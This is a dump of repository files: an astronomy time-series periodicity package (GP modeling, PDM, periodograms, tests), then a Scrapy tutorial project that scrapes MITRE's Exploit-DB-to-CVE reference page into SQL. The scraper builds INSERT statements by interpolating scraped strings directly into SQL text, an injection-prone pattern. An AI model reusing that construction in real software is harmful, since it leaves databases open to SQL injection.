"06162afac4381d2bb6244e455a35bb8a6555279d", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10339, "license_type": "permissive", "max_line_length": 117, "num_lines": 292, "path": "/periodicity/gp.py", "repo_name": "812231487/periodicity", "src_encoding": "UTF-8", "text": "from autograd import numpy as np\nimport emcee\nfrom scipy.optimize import minimize\nfrom scipy.stats import linregress\nfrom tqdm.auto import tqdm\n\nfrom .acf import gaussian, acf_harmonic_quality\n\n\nclass GPModeler(object):\n \"\"\"Abstract class implementing common functions for a GP Model\"\"\"\n def __init__(self, t, x):\n self.t = np.array(t, float)\n self.x = np.array(x, float)\n\n def uniform_prior(logp):\n window = np.logical_and(self.bounds['log_P'][0] < logp, logp < self.bounds['log_P'][1])\n probs = np.ones_like(logp)\n probs[~window] = 0.0\n return probs\n\n a, b = linregress(self.t, self.x)[:2]\n self.x -= (a * self.t + b)\n\n self.prior = uniform_prior\n self.gp = None\n self.mu = ()\n self.bounds = dict()\n self.sd = ()\n\n def lnlike(self, p):\n self.gp.set_parameter_vector(p)\n self.gp.compute(self.t)\n ll = self.gp.log_likelihood(self.x, quiet=True)\n return ll\n\n def lnprior(self, p):\n priors = np.append([gaussian(self.mu[i], self.sd[i]) for i in range(len(self.mu))], [self.prior])\n for i, (lo, hi) in enumerate(self.bounds.values()):\n if not(lo < p[i] < hi):\n return -np.inf\n lp = np.sum(np.log(priors[i](p[i])) for i in range(len(p)))\n return lp\n\n def sample_prior(self, N):\n ndim = len(self.gp)\n samples = np.inf * np.ones((N, ndim))\n m = np.ones(N, dtype=bool)\n nbad = m.sum()\n while nbad > 0:\n r = np.random.randn(N * (ndim - 1)).reshape((N, ndim - 1))\n for i in range(ndim - 1):\n samples[m, i] = r[m, i] * self.sd[i] + self.mu[i]\n samples[m, -1] = self.sample_period(nbad)\n lp = np.array([self.lnprior(p) for p in samples])\n m = ~np.isfinite(lp)\n nbad = m.sum()\n return samples\n\n def sample_period(self, N):\n logP = np.arange(self.bounds['log_P'][0], self.bounds['log_P'][1], .005)\n probs = self.prior(logP)\n probs /= probs.sum()\n periods = np.random.choice(logP.size, N, p=probs)\n samples = logP[periods]\n return samples\n\n def lnprob(self, p):\n self.gp.set_parameter_vector(p)\n lp = self.lnprior(p)\n if not np.isfinite(lp):\n return -np.inf\n return lp + self.lnlike(p)\n\n def nll(self, p, x):\n self.gp.set_parameter_vector(p)\n return -self.gp.log_likelihood(x)\n\n def grad_nll(self, p, x):\n pass\n\n def minimize(self):\n \"\"\"Minimizes negative log-likelihood function within bounds\n\n Returns\n -------\n t: array-like\n 5000 uniform time samples within modeler time array\n mu: array-like\n predicted mean function with maximum likelihood hyperparameters\n sd: array-like\n predicted error at each sample with maximum likelihood hyperparameters\n v: list\n maximum likelihood hyperparameters\n \"\"\"\n assert self.t.size <= 10000, \"Don't forget to decimate before minimizing! (N={})\".format(self.t.size)\n self.gp.compute(self.t)\n p0 = self.gp.get_parameter_vector()\n results = minimize(fun=self.nll, x0=p0, args=self.x, method='L-BFGS-B',\n jac=self.grad_nll, bounds=self.bounds.values())\n self.gp.set_parameter_vector(results.x)\n self.gp.compute(self.t)\n t = np.linspace(self.t.min(), self.t.max(), 5000)\n mu, var = self.gp.predict(self.x, self.t, return_var=True)\n sd = np.sqrt(var)\n return t, mu, sd, results.x\n\n def mcmc(self, nwalkers=50, nsteps=1000, burn=0, useprior=False):\n \"\"\"Samples the posterior probability distribution with a Markov Chain Monte Carlo simulation\n\n Parameters\n ----------\n nwalkers: int (optional default=50)\n number of walkers\n nsteps: int (optional default=1000)\n number of steps taken by each walker\n burn: int (optional default=0)\n number of burn-in samples to remove from the beginning of the simulation\n useprior: bool (optional default=False)\n whether to sample from the prior distribution or use a ball centered at the current hyperparameter vector\n\n Returns\n -------\n samples: array-like\n resulting samples of the posterior distribution of the hyperparameters\n \"\"\"\n ndim = len(self.gp)\n sampler = emcee.EnsembleSampler(nwalkers, ndim, self.lnprob)\n # TODO: figure out a way to optimize time complexity by parallel computing\n p = self.gp.get_parameter_vector()\n if useprior:\n p0 = self.sample_prior(nwalkers)\n else:\n p0 = p + 1e-5 * np.random.randn(nwalkers, ndim)\n for _ in tqdm(sampler.sample(p0, iterations=nsteps), total=nsteps):\n pass\n samples = sampler.chain[:, burn:, :].reshape(-1, ndim)\n return samples\n\n\nclass FastGPModeler(GPModeler):\n \"\"\"GP Model based on a sum of exponentials kernel (fast but not so strong)\"\"\"\n def __init__(self, t, x, log_sigma=-17, log_B=-13, log_C=0, log_L=3, log_P=2, bounds=None, sd=None):\n import celerite\n\n class CustomTerm(celerite.terms.Term):\n \"\"\"Custom sum of exponentials kernel\"\"\"\n parameter_names = (\"log_B\", \"log_C\", \"log_L\", \"log_P\")\n\n def get_real_coefficients(self, params):\n log_B, log_C, log_L, log_P = params\n a = np.exp(log_B)\n b = np.exp(log_C)\n c = np.exp(-log_L)\n return a * (1.0 + b) / (2.0 + b), c\n\n def get_complex_coefficients(self, params):\n log_B, log_C, log_L, log_P = params\n a = np.exp(log_B)\n b = np.exp(log_C)\n c = np.exp(-log_L)\n return a / (2.0 + b), 0.0, c, 2 * np.pi * np.exp(-log_P)\n\n super(FastGPModeler, self).__init__(t, x)\n self.mu = (log_sigma, log_B, log_C, log_L)\n if bounds is None:\n bounds = {'log_sigma': (-20, 0), 'log_B': (-20, 0), 'log_C': (-5, 5),\n 'log_L': (1.5, 5.0), 'log_P': (-0.69, 4.61)}\n self.bounds = bounds\n if sd is None:\n sd = (5.0, 5.7, 2.0, 0.7)\n self.sd = sd\n term = celerite.terms.JitterTerm(log_sigma=log_sigma)\n term += CustomTerm(log_B=log_B, log_C=log_C, log_L=log_L, log_P=log_P, bounds=bounds)\n self.gp = celerite.GP(term)\n\n def grad_nll(self, p, x):\n self.gp.set_parameter_vector(p)\n return -self.gp.grad_log_likelihood(x)[1]\n\n\nclass StrongGPModeler(GPModeler):\n \"\"\"GP Model based on Quasi-Periodic kernel (strong but not so fast)\"\"\"\n def __init__(self, t, x, log_sigma=-17, log_A=-13, log_L=5, log_G=1.9, log_P=2, bounds=None, sd=None):\n import george\n\n super(StrongGPModeler, self).__init__(t, x)\n self.mu = (log_sigma, log_A, log_L, log_G)\n if bounds is None:\n bounds = {'log_sigma': (-20, 0), 'log_A': (-20, 0), 'log_L': (2, 8),\n 'log_G': (0, 3), 'log_P': (-0.69, 4.61)}\n self.bounds = bounds\n if sd is None:\n sd = (5.0, 5.7, 1.2, 1.4)\n self.sd = sd\n kernel = george.kernels.ConstantKernel(log_A, bounds=[bounds['log_A']])\n kernel *= george.kernels.ExpSquaredKernel(np.exp(log_L), metric_bounds=[bounds['log_L']])\n kernel *= george.kernels.ExpSine2Kernel(log_G, log_P, bounds=[bounds['log_G'], bounds['log_P']])\n self.gp = george.GP(kernel, solver=george.HODLRSolver, white_noise=log_sigma, fit_white_noise=True)\n\n def grad_nll(self, p, x):\n self.gp.set_parameter_vector(p)\n return -self.gp.grad_log_likelihood(x)\n\n\nclass TensorGPModeler(GPModeler):\n \"\"\"GP Model using symbolic computing from PyMC3 and Theano for optimization and enabling GPUs\"\"\"\n def __init__(self, t, x, sigma=4e-8, A=2e-6, L=150, inv_G=-0.6, P=7.5):\n import pymc3 as pm\n\n super(TensorGPModeler, self).__init__(t, x)\n cov = A * pm.gp.cov.ExpQuad(1, L) * pm.gp.cov.Periodic(1, P, inv_G)\n\n raise NotImplementedError\n\n def lnlike(self, p):\n pass\n\n def lnprior(self, p):\n pass\n\n def sample_prior(self, N):\n pass\n\n def sample_period(self, N):\n pass\n\n def lnprob(self, p):\n pass\n\n def nll(self, p, x):\n pass\n\n def grad_nll(self, p, x):\n pass\n\n def minimize(self):\n pass\n\n def mcmc(self, nwalkers=50, nsteps=1000, burn=0, useprior=False):\n pass\n\n\ndef make_gaussian_prior(t, x, pmin=None, periods=None, a=1, b=2, n=8, fundamental_height=0.8, fundamental_width=0.1):\n \"\"\"Generates a weighted sum of Gaussians as a probability prior on the signal period\n\n Based on Angus et al. (2018) MNRAS 474, 2094A\n\n Parameters\n ----------\n t: array-like\n time array\n x: array-like\n input quasi-periodic signal\n pmin: float (optional)\n lower cutoff period to filter signal\n periods: list (optional)\n list of higher cutoff periods to filter signal\n a, b, n: floats (optional)\n if `periods` is not given then it assumes the first `n` powers of `b` scaled by `a`:\n periods = a * b ** np.arange(n)\n defaults are a=1, b=2, n=8\n fundamental_height: float (optional)\n weight of the gaussian mixture on the fundamental peak\n the *2 and /2 harmonics get equal weights (1-fundamental_height)/2\n default=0.8\n fundamental_width: float (optional)\n width of the gaussians in the prior\n default=0.1\n\n Returns\n -------\n gaussian_prior: function\n prior on logP\n \"\"\"\n ps, hs, qs = acf_harmonic_quality(t, x, pmin, periods, a, b, n)\n\n def gaussian_prior(logp):\n tot = 0\n fh = fundamental_height\n hh = (1 - fh) / 2\n fw = fundamental_width\n for pi, qi in zip(ps, qs):\n qi = max(qi, 0)\n gaussian1 = gaussian(np.log(pi), fw)\n gaussian2 = gaussian(np.log(pi / 2), fw)\n gaussian3 = gaussian(np.log(2 * pi), fw)\n tot += qi * (fh * gaussian1(logp) + hh * gaussian2(logp) + hh * gaussian3(logp))\n tot /= np.sum(qs)\n return tot\n\n return gaussian_prior\n" }, { "alpha_fraction": 0.7142857313156128, "alphanum_fraction": 0.7142857313156128, "avg_line_length": 20, "blob_id": "78078baa43345aeb136290a2ac31f323e758e329", "content_id": "a40b71a9c53c4861b942cbae880df6dcb2953699", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 21, "license_type": "permissive", "max_line_length": 20, "num_lines": 1, "path": "/periodicity/__init__.py", "repo_name": "812231487/periodicity", "src_encoding": "UTF-8", "text": "name = \"periodicity\"\n" }, { "alpha_fraction": 0.518778383731842, "alphanum_fraction": 0.5511762499809265, "avg_line_length": 31.30666732788086, "blob_id": "6b47311904d2fee10dcfb30817580e48527cf3e4", "content_id": "91bbd56d9a36b85ca391cae6beb61649265fa280", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4846, "license_type": "permissive", "max_line_length": 96, "num_lines": 150, "path": "/periodicity/phase.py", "repo_name": "812231487/periodicity", "src_encoding": "UTF-8", "text": "import numpy as np\nfrom .acf import gaussian, smooth\n\n\ndef stringlength(t, x, dphi=0.1, n_periods=1000, s=0):\n \"\"\"String Length\n (Dworetsky 1983, MNRAS, 203, 917)\n\n Parameters\n ----------\n t: array-like\n time array\n x: array-like\n signal array\n dphi: float (optional default=0.1)\n factor to multiply (1 / baseline) in order to get frequency separation\n n_periods: int (optional default=1000)\n number of trial periods\n s: int (optional)\n standard deviation of Gaussian filter used to smooth, measured in samples\n\n Returns\n -------\n periods: array-like\n trial periods\n ell: array-like\n string length for each period\n \"\"\"\n # scale x to range from -0.25 to +0.25\n x = (x - np.max(x)) / (2 * (np.max(x) - np.min(x))) - 0.25\n df = dphi / (np.max(t) - np.min(t))\n periods = 1 / np.linspace(df, n_periods*df, n_periods)\n periods.sort()\n ell = []\n for period in periods:\n phi = ((t / period) % 1)\n sorted_args = np.argsort(phi)\n phi = phi[sorted_args]\n m = x[sorted_args]\n ll = np.hypot(np.roll(m, -1) - m, np.roll(phi, -1) - phi).sum()\n ell.append(ll)\n # TODO: consider flagging false periods for rejection\n ell = np.array(ell)\n if s > 0:\n kernel = gaussian(mu=0, sd=s)\n h = kernel(np.arange(-(3 * s - 1), 3 * s, 1.))\n ell = smooth(ell, kernel=h)\n return periods, ell\n\n\ndef pdm(t, x, nb=5, nc=2, pmin=.01, pmax=10, n_periods=1000, s=0):\n \"\"\"Phase Dispersion Minimization\n (Stellingwerf 1978, ApJ, 224, 953)\n\n Parameters\n ----------\n t: array-like\n time array\n x: array-like\n signal array\n nb: int (optional default=5)\n number of phase bins\n nc: int (optional default=2)\n number of covers per bin\n pmin, pmax: floats (optional defaults=0.01 and 10)\n minimum/maximum trial period normalized by the baseline\n n_periods: int (optional default=1000)\n number of trial periods\n s: int (optional)\n standard deviation of Gaussian filter used to smooth, measured in samples\n\n Returns\n -------\n periods: array-like\n trial periods\n theta: array-like\n phase dispersion statistic as in Eq. 3 of the paper\n \"\"\"\n t = np.asarray(t)\n x = np.asarray(x)\n sigma = np.var(x, ddof=1)\n t0 = t.max() - t.min()\n theta = []\n periods = np.linspace(pmin*t0, pmax*t0, n_periods)\n m0 = nb * nc\n for period in periods:\n phi = ((t / period) % 1)\n sorted_args = np.argsort(phi)\n phi = phi[sorted_args]\n m = x[sorted_args]\n mj = []\n for k in range(m0):\n mask = phi >= k / m0\n mask &= phi < (k + nc) / m0\n mask |= phi < (k - (m0 - nc)) / m0\n mj.append(m[mask])\n sj = np.array([np.var(k, ddof=1) for k in mj])\n nj = np.array([k.size for k in mj])\n ss = np.sum((nj - 1) * sj)/(np.sum(nj) - m0)\n theta.append(ss/sigma)\n theta = np.array(theta)\n if s > 0:\n kernel = gaussian(mu=0, sd=s)\n h = kernel(np.arange(-(3 * s - 1), 3 * s, 1.))\n theta = smooth(theta, kernel=h)\n return periods, theta\n\n\ndef pdm2(t, x, pmin=None, pmax=None, n_periods=None, s=0, oversample=10, do_subharmonic=False):\n t = np.asarray(t)\n x = np.asarray(x)\n sigma = np.var(x, ddof=1)\n ne = t.size\n assert x.size == ne, \"incompatible array shapes\"\n theta_crit = 1. - 11. / ne ** 0.8\n dt = np.median(np.diff(t))\n t0 = t.max() - t.min()\n thetas = []\n if pmax is None:\n pmax = oversample * t0\n if pmin is None:\n pmin = 2 * dt\n if n_periods is None:\n n_periods = int((1 / pmin - 1 / pmax) * oversample * t0 + 1)\n periods = np.linspace(pmax, pmin, n_periods)\n for period in periods:\n phi = ((t - t[0]) / period) % 1\n masks = np.array([np.logical_and(phi < (b + 1) / 10, phi >= b / 10) for b in range(10)])\n sj = np.array([np.var(x[masks[j]], ddof=1) for j in range(10)])\n nj = masks.sum(axis=1)\n good = nj > 1\n ss = np.sum((nj[good] - 1) * sj[good]) / np.sum(nj[good] - 1)\n theta = ss / sigma\n if do_subharmonic and period <= pmax / 2 and theta < theta_crit:\n sub_index = int((n_periods - 1) * (1 - (2 * period - pmin) / (pmax - pmin)) + 0.5)\n theta = (theta + thetas[sub_index]) / 2\n thetas.append(theta)\n thetas = np.array(thetas)[::-1]\n periods = periods[::-1]\n if s > 0:\n kernel = gaussian(mu=0, sd=s)\n h = kernel(np.arange(-(3 * s - 1), 3 * s, 1.))\n thetas = smooth(thetas, kernel=h)\n return periods, thetas\n\n# TODO: Analysis of Variance (Schwarzenberg-Czerny 1989)\n\n# TODO: Gregory-Loredo method (Gregory & Loredo 1992)\n\n# TODO: conditional entropy method (Graham et al. 2013)\n" }, { "alpha_fraction": 0.6053593158721924, "alphanum_fraction": 0.6224116683006287, "avg_line_length": 31.84000015258789, "blob_id": "b6e5d96713310aae873faf71b486d1acc1843476", "content_id": "dae53a71a0485c6469d076fb8be1c3fa10a75c0d", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 821, "license_type": "permissive", "max_line_length": 81, "num_lines": 25, "path": "/setup.py", "repo_name": "812231487/periodicity", "src_encoding": "UTF-8", "text": "import setuptools\n\nwith open(\"README.md\", 'r') as f:\n long_description = f.read()\n\nsetuptools.setup(\n name=\"periodicity\",\n version=\"0.1.0b3\",\n author=\"Eduardo Nunes\",\n author_email=\"[email protected]\",\n license=\"MIT\",\n description=\"Useful tools for analysis of periodicities in time series data\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/dioph/periodicity\",\n packages=setuptools.find_packages(),\n install_requires=['numpy>=1.11', 'astropy>=1.3', 'scipy>=0.19.0',\n 'emcee', 'tqdm', 'autograd'],\n classifiers=(\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: OS Independent\",\n \"Intended Audience :: Science/Research\",\n ),\n)\n" }, { "alpha_fraction": 0.6148012280464172, "alphanum_fraction": 0.6223849654197693, "avg_line_length": 30.344263076782227, "blob_id": "b84cf837a1fae0f987cf7c556869cb54d036cecd", "content_id": "2938ff3ef95d2fb92e6e510b499c94626f21975f", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3824, "license_type": "permissive", "max_line_length": 97, "num_lines": 122, "path": "/periodicity/periodogram.py", "repo_name": "812231487/periodicity", "src_encoding": "UTF-8", "text": "import numpy as np\nfrom astropy.stats import LombScargle\nfrom wavelets import WaveletAnalysis\n\n\ndef lombscargle(t, x, dx=None, f0=0, fmax=None, n=5, fap_method=None, fap_level=None, psd=False):\n \"\"\"Computes the generalized Lomb-Scargle periodogram of a discrete signal x(t)\n\n Parameters\n ----------\n t: array-like\n time array\n x: array-like\n signal array\n dx: array-like (optional)\n measurement uncertainties for each sample\n f0: float (optional default=0)\n minimum frequency\n fmax: float (optional)\n maximum frequency\n If None is given, defaults to the pseudo-Nyquist limit\n n: float (optional default=5)\n samples per peak\n fap_method: string {None, 'baluev', 'bootstrap'}\n the approximation method to use for highest peak FAP and false alarm levels\n None by default\n fap_level: array-like (optional)\n false alarm probabilities to approximate heights\n psd: bool (optional)\n whether to leave periodogram unnormalized (Fourier Spectral Density)\n\n Returns\n -------\n ls: astropy.stats.LombScargle object\n the full object for the given dataset\n f: array-like\n frequency array\n a: array-like\n power array\n fap: float\n false alarm probability of highest peak\n fal: float\n false alarm level for a given FAP\n \"\"\"\n if psd:\n ls = LombScargle(t, x, dy=dx, normalization='psd')\n else:\n ls = LombScargle(t, x, dy=dx)\n if fmax is None:\n T = float(np.median(np.diff(t)))\n fs = 1 / T\n fmax = fs / 2\n f, a = ls.autopower(samples_per_peak=n, minimum_frequency=f0, maximum_frequency=fmax)\n if fap_method is not None:\n assert fap_method in ['baluev', 'bootstrap'], \"Unknown FAP method {}\".format(fap_method)\n fap = ls.false_alarm_probability(a.max(), method=fap_method, minimum_frequency=f0,\n maximum_frequency=fmax, samples_per_peak=n)\n if fap_level is not None:\n fal = ls.false_alarm_level(fap_level, method=fap_method, minimum_frequency=f0,\n maximum_frequency=fmax, samples_per_peak=n)\n return ls, f, a, fap, fal\n return ls, f, a, fap\n return ls, f, a\n\n\ndef window(t, n=5):\n \"\"\"Computes the periodogram of the window function\n\n Parameters\n ----------\n t: array-like\n times of sampling comb window\n n: float (optional default=5)\n samples per peak\n Returns\n -------\n f: array-like\n frequency array\n a : array-like\n power array\n \"\"\"\n ls = LombScargle(t, 1, fit_mean=False, center_data=False)\n f, a = ls.autopower(minimum_frequency=0, samples_per_peak=n)\n return f, a\n\n\ndef wavelet(t, x, pmin=0, pmax=None, n_periods=1000):\n \"\"\"Global Wavelet Power Spectrum using Morlet wavelets\n\n Parameters\n ----------\n t: array-like\n time array\n x: array-like\n signal array\n pmin: float (optional default=0)\n minimum period\n pmax: float (optional default None)\n maximum period; if None is given, uses default scaling\n n_periods: int (optional default=1000)\n number of trial periods\n\n Returns\n -------\n wa: wavelets.WaveletAnalysis object\n the full object for the given dataset\n periods: array-like\n trial periods array\n gwps: array-like\n Global Wavelet Power Spectrum (WPS projected on period axis)\n wps: array-like\n Wavelet Power Spectrum\n \"\"\"\n dt = float(np.median(np.diff(t)))\n wa = WaveletAnalysis(x, t, dt=dt, mask_coi=True, unbias=True)\n periods = wa.fourier_periods\n wps = wa.wavelet_power\n gwps = wa.global_wavelet_spectrum\n return wa, periods, gwps, wps\n\n\n# TODO: check out Supersmoother (Reimann 1994)\n" }, { "alpha_fraction": 0.6419752836227417, "alphanum_fraction": 0.7654321193695068, "avg_line_length": 8, "blob_id": "97383fa96bcdd3d16a462a8b984db62611d7b7aa", "content_id": "4fd2779f86a0171b204d58749ac3657963be989b", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 81, "license_type": "permissive", "max_line_length": 13, "num_lines": 9, "path": "/requirements.txt", "repo_name": "812231487/periodicity", "src_encoding": "UTF-8", "text": "numpy>=1.11\nastropy>=1.3\nscipy>=0.19.0\nemcee\ntqdm\ngeorge\ncelerite\nautograd\npymc3\n" }, { "alpha_fraction": 0.5946632623672485, "alphanum_fraction": 0.6423125863075256, "avg_line_length": 31.79166603088379, "blob_id": "199e286788d0bb3c333ecf79301720cecd8451ec", "content_id": "a872305ae201293c22d04e4ab8ebf70dc9fa90df", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1574, "license_type": "permissive", "max_line_length": 103, "num_lines": 48, "path": "/periodicity/tests/test_gp.py", "repo_name": "812231487/periodicity", "src_encoding": "UTF-8", "text": "from .. import gp\nfrom astropy.io import ascii\n\nfrom .. import gp\n\nlightcurve1 = ascii.read('periodicity/tests/data/lightcurve1.csv')\nlightcurve2 = ascii.read('periodicity/tests/data/lightcurve2.csv')\n\n\ndef test_file_format_lightcurve1():\n assert lightcurve1.colnames == ['time', 'flux', 'flux_err']\n assert lightcurve1['flux'].size == lightcurve1['time'].size\n assert lightcurve1['time'].size == 2145\n\n\ndef test_file_format_lightcurve2():\n assert lightcurve2.colnames == ['time', 'flux', 'flux_err']\n assert lightcurve2['flux'].size == lightcurve2['time'].size\n assert lightcurve2['time'].size == 2148\n\n\ndef test_make_gaussian_prior1():\n prior = gp.make_gaussian_prior(lightcurve1['time'], lightcurve1['flux'])\n logp = gp.np.linspace(-3, 5, 1000)\n probs = prior(logp)\n assert probs.argmax() == 775\n peaks = [i for i in range(1, len(logp) - 1) if probs[i - 1] < probs[i] and probs[i + 1] < probs[i]]\n assert len(peaks) == 7\n\n\ndef test_make_gaussian_prior2():\n prior = gp.make_gaussian_prior(lightcurve2['time'], lightcurve2['flux'])\n logp = gp.np.linspace(-3, 5, 1000)\n probs = prior(logp)\n assert probs.argmax() == 671\n peaks = [i for i in range(1, len(logp) - 1) if probs[i - 1] < probs[i] and probs[i + 1] < probs[i]]\n assert len(peaks) == 7\n\n\ndef test_class_constructor():\n model = gp.FastGPModeler([1, 2], [3, 4])\n assert model.mu == (-17, -13, 0, 3)\n\n\ndef test_minimize():\n model = gp.FastGPModeler(lightcurve2['time'], lightcurve2['flux'])\n _, _, _, v = model.minimize()\n assert 2.35 < v[4] < 2.37\n" } ]
9
seflaherty/scraping-demo
https://github.com/seflaherty/scraping-demo
0d759f418d397bc6764741abab654f98ce34a149
271cd434190b2dc1a77d7d738f038423162a0b71
5eb88b487b93036804d3466af892d717f0b39913
refs/heads/main
2023-08-18T16:41:45.943785
2021-10-18T12:40:03
2021-10-18T12:40:52
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6584158539772034, "alphanum_fraction": 0.6732673048973083, "avg_line_length": 24.25, "blob_id": "1dd40e4c574032b5a38d6339c285a6139d8eb787", "content_id": "327868b228d6bc2adfcd92daca95ac7a7b60f82c", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "SQL", "length_bytes": 202, "license_type": "permissive", "max_line_length": 40, "num_lines": 8, "path": "/sql_files/create.sql", "repo_name": "seflaherty/scraping-demo", "src_encoding": "UTF-8", "text": "-- Uncomment when db doesn't exist\n-- CREATE DATABASE exploitdb\n-- ENCODING 'UTF8';\n--\n-- CREATE TABLE IF NOT EXISTS exploits (\n-- \tid integer primary key,\n-- \texploit_id VARCHAR(60),\n-- \tcves TEXT);\n" }, { "alpha_fraction": 0.533544659614563, "alphanum_fraction": 0.5393555164337158, "avg_line_length": 36.117645263671875, "blob_id": "d7d937144a63c4d16b3056eebcab461a70f3d192", "content_id": "3abba30fd6bf059865645f6e8ede160848cc3a6a", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1893, "license_type": "permissive", "max_line_length": 93, "num_lines": 51, "path": "/cve/cve/spiders/exploit.py", "repo_name": "seflaherty/scraping-demo", "src_encoding": "UTF-8", "text": "import scrapy\nimport os\nfrom os.path import dirname\n\ncurrent_dir = os.path.dirname(__file__)\nurl = os.path.join(current_dir, 'source-EXPLOIT-DB.html')\ntop_dir = dirname(dirname(dirname(current_dir)))\nsql_file = os.path.join(top_dir, 'sql_files/populate.sql')\n\nclass ExploitSpider(scrapy.Spider):\n name = 'exploit'\n allowed_domains = ['cve.mitre.org']\n # Starting with actual URLs is fine\n #start_urls = ['http://cve.mitre.org/data/refs/refmap/source-EXPLOIT-DB.html']\n # But you can use files as well!\n start_urls = [f\"file://{url}\"]\n\n def parse(self, response):\n table = None\n count = 0\n for child in response.xpath('//table'):\n if len(child.xpath('tr')) > 100:\n table = child\n for row in table.xpath('//tr'):\n if count > 100:\n break\n cve_list = []\n try:\n # This captures 1 CVE only, but you may have many\n exploit_id = row.xpath('td//text()')[0].extract()\n cve_id = row.xpath('td//text()')[2].extract()\n print(f\"exploit id: {exploit_id} -> {cve_id}\")\n append_sql_file(exploit_id, cve_id)\n# # This is one way of doing that\n# for text in row.xpath('td//text()'):\n# if text.extract().startswith('CVE'):\n# cve_list.append(text.extract())\n# print(f\"exploit id: {exploit_id} -> {cve_list}\")\n except Exception as err:\n print(f\"skipping due to: {err}\")\n count += 1\n\n\ndef append_sql_file(exploit_id, cves):\n line = f\"INSERT INTO exploit(exploit_id, cves) VALUES ('{exploit_id}', '{str(cves)}');\\n\"\n if not os.path.exists(sql_file):\n with open(sql_file, 'w') as _f:\n _f.write(line)\n return\n with open(sql_file, 'a') as _f:\n _f.write(line)\n" }, { "alpha_fraction": 0.7063291072845459, "alphanum_fraction": 0.7174050807952881, "avg_line_length": 45.131385803222656, "blob_id": "6d88d1d579cf75bbedffe6992852064e43406dbb", "content_id": "6bde9219af43d5f547377080fb0f7d6f598da832", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 6322, "license_type": "permissive", "max_line_length": 472, "num_lines": 137, "path": "/README.md", "repo_name": "seflaherty/scraping-demo", "src_encoding": "UTF-8", "text": "# scraping-demo\nDemo for scraping using scrapy, parsing a real website, extracting key information that is not available through an API and using SQL to query it later.\n\nInstall _requirements.txt_ in a virtual environment\n\n```\n$ python3 -m venv venv\n$ source venv/bin/activate\n$ pip install -r requirements.txt\n```\n\nGet started with scrapy: https://docs.scrapy.org/en/latest/intro/tutorial.html\n\n```\n$ scrapy startproject cve\n$ scrapy genspider exploit cve.mitre.org\n```\n\nUse XPath or the CSS module to find nodes. XPath is a query language for finding and selecting nodes in an XML document that is also useful for HTML.\n\n```\n$ scrapy shell http://cve.mitre.org/data/refs/refmap/source-EXPLOIT-DB.html\n>>> response.url\n'http://cve.mitre.org/data/refs/refmap/source-EXPLOIT-DB.html'\n>>> response.css\n<bound method TextResponse.css of <200 http://cve.mitre.org/data/refs/refmap/source-EXPLOIT-DB.html>>\n>>> response.xpath('//table')\n[<Selector xpath='//table' data='<table style=\"width:100%;border-colla...'>, <Selector xpath='//table' data='<table style=\"text-align:right\"><tr><...'>, <Selector xpath='//table' data='<table cellpadding=\"2\" cellspacing=\"2...'>, <Selector xpath='//table' data='<table cellpadding=\"2\" cellspacing=\"2...'>, <Selector xpath='//table' data='<table>\\n <tr>\\n ...'>]\n>>> len(response.xpath('//table'))\n5\n>>> response.css('table')\n[<Selector xpath='descendant-or-self::table' data='<table style=\"width:100%;border-colla...'>, <Selector xpath='descendant-or-self::table' data='<table style=\"text-align:right\"><tr><...'>, <Selector xpath='descendant-or-self::table' data='<table cellpadding=\"2\" cellspacing=\"2...'>, <Selector xpath='descendant-or-self::table' data='<table cellpadding=\"2\" cellspacing=\"2...'>, <Selector xpath='descendant-or-self::table' data='<table>\\n <tr>\\n ...'>]\n>>> len(response.css('table'))\n5\n```\n\nFind the biggest table:\n\n```\n>>> for table in response.css('table'):\n... if len(table.xpath('tr')) >10:\n... print(table)\n```\n\nOr:\n\n```\n>>> len(response.css('table'))\n5\n>>> len(response.xpath('//table'))\n5\n>>> len(response.css('table')[0].xpath('tr'))\n3\n>>> len(response.css('table')[1].xpath('tr'))\n3\n>>> len(response.css('table')[2].xpath('tr'))\n4\n>>> len(response.css('table')[3].xpath('tr'))\n10839\n\n```\n\nNone of these tables have any method of identificaion so you are forced to look into each table to see if there are enough elements that can signal the table we are interested in, the one that holds several thousand rows.\n\n```\n>>> row = data[0]\n>>> print(row.getall()[0])\n<tr>\n<td>EXPLOIT-DB:10102</td>\n<td> <a href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4186\">CVE-2009-4186</a>\n</td>\n</tr>\n```\n\nGet the value of href using xpath:\n\n```\n>>> row.xpath('td//a/@href')[0].extract()\n'http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4186'\n```\n\nThere is no need for the href though because all CVEs have the same URL construction.\n\n## Local parsing\nThe first few iterations of parsing an online document will take some effort. Instead of using several requests that get data from a website, download the data _once_ and parse locally. This method has a few positive aspects to it:\n\n- Reduces online requests to 0 for retrying failed attempts\n- Increases speed by an order of magnitude since the HTML is already on disk\n- Easier to debug or test alternative (or modified) HTML parsing\n\n## CI/CD\nOnce local parsing is done and you aresatisfied with a few succesful passes, then it is time to start thinking about automation. Any pipeline or pipeline-like service should work, as long as you are clear about the steps to set the project up. CI/CD jobs require like this project need to clearly define its inputs and outputs.\n\nIn this case, the input is the HTML, which has to be processed. But the output for the demo is a remote PostgreSQL database in Azure. This creates a pain point that must be resolved: depending on the platform where the job executes, a plugin or helper will be required to move parsed data into the database.\n\nIf this job existed in an Azure pipeline job, it would probably be straightforward to connect to the Azure PostgreSQL DB. But this job is running on Github Actions and pushing data to Azure. An Azure Github Action and Azure PostgreSQL action is required to authenticate and push SQL statements over. Further, firewall changes must happen to allow 